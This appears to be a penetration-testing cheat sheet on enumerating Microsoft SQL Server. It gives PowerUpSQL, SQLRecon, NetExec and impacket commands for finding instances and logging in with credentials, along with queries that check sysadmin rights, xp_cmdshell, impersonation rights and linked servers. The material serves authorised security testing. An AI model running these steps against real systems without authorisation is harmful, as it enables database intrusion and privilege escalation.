Microsoft SQL Enumeration

Table of contents

  1. Prerequisites
  2. Exploit

Prerequisites

  • Microsoft SQL service in running on the target machine (default port: 1433).

Exploit

As an unauthenticated user, use PowerUpSQL to enumerate Microsoft SQL instance.

Import-Module PowerUpSQL.ps1
Get-SQLInstanceDomain
Get-SQLConnectionTest -Instance "$hostname,$port" | Format-List
Get-SQLServerInfo -Instance "$hostname,$port"

You can also use SQLRecon.

# Enumerate instances.
./SQLRecon.exe /enum:sqlspns

# Try to authenticate with the currently logged on user.
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:whoami

# Enumerate domain users that belong to a group with `SQL` in it.
Get-DomainGroup -Identity *SQL* | % { Get-DomainGroupMember -Identity $_.distinguishedname | select groupname, membername }

If you have credentials, you can use them like following.

# Test authenticated connection on MSSQL database.
./NetExec.exe mssql $target -d $domain -u $username -p $password

# Connect to the database.
impacket-mssqlclient -u $domain/$username:$password@$target -windows-auth

# Connect with SQLRecon.
./SQLRecon.exe /a:windomain /d:$domain /u:$username /p:$password /h:$hostname,$port /m:whoami

One authenticated, you can query the database (with the CLI SQL> if you are using impacket-mssqlclient).

Get-SQLQuery -Instance "$hostname,$port" -Query "select @@servername"
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:query /c:"select @@servername"

Use following querys to get useful information about the instance.

-- Get currently logged on user.
SELECT SYSTEM_USER;

-- Check if currently logged on user is sysadmin.
SELECT IS_SRVROLEMEMBER('sysadmin');

-- Check if xp_cmdshell is enabled.
SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';

-- Get principals with impersonation rights.
SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';

-- Get principal IDs.
SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;

-- Get links.
SELECT srvname, srvproduct, rpcout FROM master..sysservers;

You can also check context switching like so. Following command will list principal the currently logged on user can impersonate.

./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:impersonate